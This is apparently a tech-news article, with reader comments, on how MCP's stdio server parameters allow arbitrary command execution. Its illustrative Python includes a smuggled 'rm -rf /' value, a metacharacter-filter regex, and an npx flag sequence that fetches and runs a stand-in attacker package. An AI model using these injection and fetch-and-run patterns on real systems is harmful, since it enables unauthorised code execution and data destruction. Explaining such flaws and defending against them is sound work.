How Anthropic’s Model Context Protocol Allows For Easy Remote Execution

As part of the effort to push Large Language Model (LLM) ‘AI’ into more and more places, Anthropic’s Model Context Protocol (MCP) has been adopted as the standard for connecting LLMs to various external tools and systems in a client-server model. A slight oversight in the architecture of this protocol is that remote execution of arbitrary commands (RCE) is effectively an essential part of its design, as covered in a recent article by OX Security.

The flaw, which the breakdown article covers in detail, applies to all implementations regardless of the programming language used. Essentially, the StdioServerParameters passed to the remote server to create a new local instance on said server can contain any command and arguments, which are then executed in a server-side shell.
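To make the mechanism concrete, here is a minimal Python sketch. The `StdioServerParameters` dataclass below is a simplified stand-in for the one in the MCP SDKs, and `launch_server` is a hypothetical helper, but they mirror the core issue: whatever command and arguments the parameters carry are executed verbatim on the server side.

```python
import subprocess
from dataclasses import dataclass, field

# Simplified stand-in for MCP's StdioServerParameters: a command
# plus an argument list, carried as-is.
@dataclass
class StdioServerParameters:
    command: str
    args: list[str] = field(default_factory=list)

def launch_server(params: StdioServerParameters) -> str:
    # Hypothetical server-side launcher: the client-supplied command
    # is executed without any constraint from the protocol itself.
    result = subprocess.run(
        [params.command, *params.args],
        capture_output=True, text=True, check=True,
    )
    return result.stdout

# A "tool server" request that is really just arbitrary execution:
print(launch_server(StdioServerParameters("echo", ["pwned"])))
```

Nothing here distinguishes a legitimate tool server from any other executable, which is exactly the design point the researchers flagged.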

Essentially the issue is a lack of input sanitization, which is only the most common source of exploited CVEs. Across multiple real-world exploitation attempts on the software of LettaAI, LangFlow, Flowise, and Windsurf it was possible to achieve RCE, or local code execution in the case of the Windsurf IDE. Although Flowise had implemented some input sanitization by limiting the allowed commands and stripping special characters, this was bypassed using standard flags of the npx command.
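A sketch of why that kind of filter fails, assuming a hypothetical sanitizer of the shape described (a command allow-list plus metacharacter stripping): the command’s own flags are never treated as hostile, yet npx’s real `--yes` and `--package` flags are enough to fetch and run an attacker-chosen package, no shell metacharacters required.

```python
import re

# Hypothetical reconstruction of the kind of filter described:
# allow-list the executable, reject shell metacharacters in arguments.
ALLOWED_COMMANDS = {"npx", "node"}

def naive_sanitize(command: str, args: list[str]) -> bool:
    if command not in ALLOWED_COMMANDS:
        return False
    return all(not re.search(r"[;&|`$<>]", a) for a in args)

# Classic shell injection is blocked...
assert not naive_sanitize("npx", ["cowsay; rm -rf /"])

# ...but the command's own flags sail straight through, and with npx
# they can pull and execute an arbitrary package from the registry.
assert naive_sanitize("npx", ["--yes", "--package=attacker-pkg", "attacker-cmd"])
```

The lesson is that allow-listing a command without also pinning its arguments allow-lists everything that command can be talked into doing.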

After contacting Anthropic to inform them of these issues with MCP, the researchers were told that there was no design flaw, and essentially had a ‘no-fix, works as designed’ hurled at them. According to Anthropic it is the responsibility of the developer to perform input sanitization, which is interesting considering that they themselves provide a range of reference implementations.
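If the burden really is on the developer, one defensive pattern (a sketch under our own assumptions, not anything from Anthropic’s documentation; all names here are hypothetical) is to never build server parameters from user input at all, and instead resolve a short name against a pinned registry of full executable paths and fixed argument lists:

```python
# Hypothetical developer-side mitigation: pin full executable paths
# and exact argument lists instead of sanitizing free-form input.
PINNED_SERVERS = {
    "filesystem": ("/usr/local/bin/mcp-server-fs", ["--root", "/srv/data"]),
}

def resolve_server(name: str) -> tuple[str, list[str]]:
    try:
        command, args = PINNED_SERVERS[name]
    except KeyError:
        raise ValueError(f"unknown MCP server: {name!r}")
    # Return a copy of the args so callers cannot mutate the pinned config.
    return command, list(args)
```

With this shape, the only client-controlled value is a lookup key, so there is nothing left to sanitize.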

24 thoughts on “How Anthropic’s Model Context Protocol Allows For Easy Remote Execution”

    1. urgh, thought it was a ‘something’. should have read it before so excitedly overreacting.

      BTW Hackaday, MCP is really big news! Chinese sites like yours are loaded with AI chatbots with MCP capabilities, and their associated projects controlling and accessing EVERYTHING!!!

  1. Yeah this is really really dumb. hurr durr the thing that lets your agents execute arbitrary stuff…lets your agents execute arbitrary stuff.

    It also has nothing to do with MCP per se, just the stdio way that it was invoked in the early days.

    1. It’s like everything in the world: risk/reward and knowing the boundaries. Just because it’s the latest buzzword changes nothing in that regard. It can be a useful tool, much like credit, but in the wrong hands it can mess you up.

    1. Me too…. That said, I don’t like the implications of having its ‘fingers’ in everything. Looks like a dictating government’s dream come true! All the more reason for local-only access (no cloud) within your sphere as a company or individual. But my guess is a lot of people won’t care and will just embrace the cloud and all its ‘benign’ services… until it is too late.

  2. I’m struggling to understand how Anthropic or the protocol is responsible for the vulnerabilities. If a service’s configuration allows setting up calls to an executable file, it should allow you to configure any command you want. I haven’t tried but I’m under the impression that, say, you could configure the Apache HTTP daemon to run “FORMAT C:” when a PHP file is requested. This wouldn’t mean that the HTTP protocol is faulty but that you are an idiot. Even more so if your service allows a remote user to change your config files (like in the sixth vulnerability). What am I missing?

    On the other hand, this OX company works closely with the government+military+industrial cronies, the same ones with which Anthropic apparently has some misunderstandings.

    1. Apache doesn’t come with preconfigured setups to format your c:

      It’s also run with limited permissions usually.

      I think the issue is that MCP implementations do have these issues.

  3. sometimes giving arbitrary code execution to a system or entity has value. when i am hired by a new company as a developer, i am given arbitrary code execution, but, because i am trusted and trustworthy, nothing bad happens. presumably the same thinking will eventually be applied to suitably-advanced AI, especially if they are to completely replace us. i myself write code on occasion that gives arbitrary code execution to others. for example, i wrote a comprehensive reporting system that allows the execution of arbitrary PHP code. why? because i want to be able to run such code myself. obviously, you would not entrust such a system to the unscreened general public (or their AI agents).

    1. What company gives new devs arbitrary execution on prod?

      In my experience, you need to act ‘trusted and trustworthy’ for a while before they stop reviewing your code changes and the fun can begin.

      You should lock down the arbitrary reporting system better.
      Sooner or later someone you delegated authority to will give the wrong person permissions.
      Most likely that wrong person will just be a talented idiot, but could be a thief too.

      1. i usually get access the moment the production server craps the bed and i am the only one with an idea of how to fix it. sometimes it takes months for this to happen, but i’ve had it happen in the first week — typically because the last person who knew what to do rage quit

      2. Quite a lot of places actually, and most won’t really be described as companies, but they regularly give newhires not just PROD, but master keys to all the buildings as well as safes with gold bars, unlimited/unchecked use of the company helicopter/jet/mansions, etc etc.

        1. They exist…

          The silver bars are 1 gram ‘free for new investors’, the ‘mansion’/data center is a dry singlewide powered by an orange cord, the ‘jet’ is the flatulent friendly dog, the ‘heli’ is a broken $50 quad that you are responsible for fixing if you so much as look at it.

          Your job should be to avoid these employers.

          Also Prod is in MySQL (or forks).

          HackADay is, apparently, such an organization.

  4. The problem is people who have zero experience as a sysadmin are exposing production systems to what is essentially RCE-aaS and there are now tens of thousands of services that have essentially compromised themselves because the CEO wants to AI.

  5. This is primarily why agentic interaction with the OS is a major security nightmare. The solution of course is to run your LLM locally, but this won’t stop your $30,000 super GPU system from running malicious commands. I think it’s time to admit that scaling parameter size is insufficient for LLMs to interact safely with systems.
